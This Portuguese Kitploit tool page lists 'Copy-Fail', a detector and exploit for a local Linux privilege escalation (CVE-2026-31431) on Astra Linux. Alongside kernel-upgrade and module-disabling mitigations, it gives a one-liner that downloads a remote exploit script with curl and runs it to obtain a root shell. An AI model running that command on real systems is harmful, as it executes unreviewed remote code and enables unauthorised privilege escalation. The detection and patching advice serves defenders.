Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Copy-Fail — Detecta e explora a escalada de privilégios local CVE-2026-31431 (Copy Fail) no Astra Linux, com compatibilidade com Python 3.7+ e implantação em uma única linha. | Kitploit
Ferramentas/GitHubGitHub/p401a-ops/copy-fail
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de Penetração
GitHubp401a-ops/copy-fail

Copy-Fail

Detecta e explora a escalada de privilégios local CVE-2026-31431 (Copy Fail) no Astra Linux, com compatibilidade com Python 3.7+ e implantação em uma única linha.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-31431 "Copy Fail" - Escalação de Privilégios Local

Versão compatível com Python 3.7+ (incluindo Astra Linux)

Verificação segura sem exploração:

root@kitploit:~
curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/detect.py | python3

Exploração (quando solicitado, será necessário inserir a senha do usuário)

root@kitploit:~
python3 -c "$(curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/exp.py)" --shell

Esta versão do exploit

Este é um fork adaptado para Python 3.7, 3.8, 3.9, 3.10, 3.11. Os exploits originais exigem Python 3.12+ devido ao uso de os.splice().

Por que o original não funciona?

root@kitploit:~
# ❌ Exploit original (apenas Python 3.12+)
os.splice(fd_in, fd_out, length, offset_src=offset)
# AttributeError: module 'os' has no attribute 'splice'

O que foi alterado neste fork?

  • Removida a dependência de os.splice()
  • Adicionada compatibilidade com Python 3.7+
  • Exploit testado no Astra Linux
  • Mantida a compatibilidade com distribuições modernas
  • Adicionado um one-liner simples para execução

Notas

  • É necessário acesso local ao sistema
  • O Python deve estar instalado no sistema
  • Testado no Astra Linux CE/SE
  • Funciona sem Python 3.12+

###Exploração no Astra Linux

A vulnerabilidade foi verificada no Astra Linux. O módulo algif_aead está presente, e a exploração permite obter acesso ao sudo e elevar privilégios para root.

No entanto, com o controle de acesso mandatório (CAM/Parsec) habilitado, não é possível tornar-se superadministrador (nível 63 / função astra-admin): os rótulos mandatórios restringem os privilégios até mesmo do processo root, e a política de segurança não permite cruzar os níveis de confidencialidade estabelecidos.

Portanto: 🔴 Sistemas Astra Linux sem CAM ou com CAM desabilitado — totalmente vulneráveis. 🟡 Sistemas com CAM habilitado — parcialmente protegidos: obter root é possível, mas as capacidades reais do atacante são limitadas pela política mandatória.

Em ambos os casos, ao detectar a vulnerabilidade, a aplicação das medidas dos itens 2 ou 3 é obrigatória.

━━━━━━━━━━━━━━━

  1. Verificação da presença da vulnerabilidade

Em cada servidor, é necessário executar o seguinte comando. Ele não faz nenhuma alteração no sistema e apenas verifica se o módulo vulnerável está disponível.

Conectar ao servidor e executar em uma única linha:

python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("\n" + "*"30 + "\n** VULNERÁVEL **\n" + ""*30)'

🔴 Se a palavra VULNERÁVEL aparecer na tela — o servidor está suscetível à vulnerabilidade, é necessário prosseguir para o item 2. 🟢 Se uma mensagem de erro do Python aparecer — o servidor não está suscetível à vulnerabilidade, nenhuma ação adicional é necessária.

━━━━━━━━━━━━━━━ 2. Solução principal — atualização do kernel

É necessário atualizar o kernel para uma versão que contenha a correção: 6.18.22, 6.19.12 ou mais recente. Até a atualização, a desativação do módulo do item 3 garante a proteção.

Para Debian / Ubuntu / Astra Linux:

apt-get update apt-get dist-upgrade reboot

Após a reinicialização, é obrigatório verificar se o novo kernel foi realmente carregado:

uname -r

Se o comando mostrar uma versão inferior a 6.18.22 — o kernel não foi atualizado ou o sistema inicializou com uma imagem antiga. Nesse caso, é necessário garantir que a atualização foi instalada (apt-get dist-upgrade não retornou erros) e repetir a reinicialização.

⚠️ Astra Linux 1.7.x: Até o lançamento da atualização, a única medida de proteção é a desativação do módulo do item 3. Para obter o patch, recomenda-se entrar em contato com o suporte técnico do Astra Linux pelo painel pessoal.

━━━━━━━━━━━━━━━ 3. Medida temporária de proteção — desativação do módulo vulnerável

Se a atualização do kernel não for possível no momento, como medida temporária recomenda-se desativar o módulo vulnerável. A operação não exige reinicialização e entra em vigor imediatamente. Antes da aplicação, recomenda-se testar as alterações em um ambiente de teste: em casos raros, alguns serviços podem usar esse módulo diretamente.

Comando para desativar o módulo. Executar como root (ou via sudo):

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true

O primeiro comando proíbe o carregamento do módulo nas próximas inicializações. O segundo o descarrega agora, se estiver carregado. Um erro no segundo comando é normal, significa que o módulo já não estava ativo.

Baixar ferramenta